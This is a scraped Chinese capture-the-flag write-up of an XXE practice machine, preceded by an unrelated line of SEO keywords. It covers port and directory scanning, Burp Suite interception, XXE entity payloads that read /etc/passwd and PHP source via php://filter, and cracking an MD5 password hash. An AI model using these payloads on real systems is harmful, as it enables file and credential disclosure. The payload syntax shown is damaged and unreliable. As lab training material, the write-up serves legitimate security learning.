购卡链接网站怎么做,网站建设项目进展情况汇报,网站建设公司怎么盈,wordpress给导航加图标XXE靶机
一.扫描端口 进入xxe靶机 1.1然后进入到kali里 使用namp 扫描一下靶机开放端口等信息 1.2扫描他的目录 二 利用获取的信息
进入到 robots.txt 按他给出的信息 去访问xss 是一个登陆界面 admin.php 也是一个登陆界面 我们访问xss登陆界面 随便输 打开burpsuite抓包 发…XXE靶机
一.扫描端口 进入xxe靶机 1.1然后进入到kali里 使用namp 扫描一下靶机开放端口等信息 1.2扫描他的目录 二 利用获取的信息
进入到 robots.txt 按他给出的信息 去访问xss 是一个登陆界面 admin.php 也是一个登陆界面 我们访问xss登陆界面 随便输 打开burpsuite抓包 发现数据以post方式提交并在最下方有xxe代码 发送到repeater提交试试
这里注意 ad 有回显 那么如果将ad 指向其他文件 有可能就有xxe漏洞 三.漏洞利用
我们构造xxe语句 访问 etc/passwd/看看是否有回显
!DOCTYPE test[
!ENTITY ad SYSTEM file:///etc/passwd
]可以看到显示文件 那么继续查看文件 apache首页文件默认路径/var/www/html
发现读取不了
!DOCTYPE test[
!ENTITY ad SYSTEM file:///var/www/html/xxe/index.php
]我们可以用php伪文件协议读取
!DOCTYPE test[
!ENTITY ad SYSTEM php://filter/readconvert.base64-encode/resource/var/www/html/xxe/index.php
]再通过base64 解密 可以看到里面的内容并没有我们想要的 没有可以利用的 但是还有一个文件 /xxe/admin/ 我们没有查看
我们可以用同样的方式查看
!DOCTYPE test[
!ENTITY ad SYSTEM php://filter/readconvert.base64-encode/resource/var/www/html/xxe/admin.php
]base64解密后得到关键信息
可以看到用户名跟md5加密后的密码 md5加密后的密码解密得出用户密码 登入 发现里面没有我们想要的flag 看看是否在xxe文档下
查看页面源代码 得到flag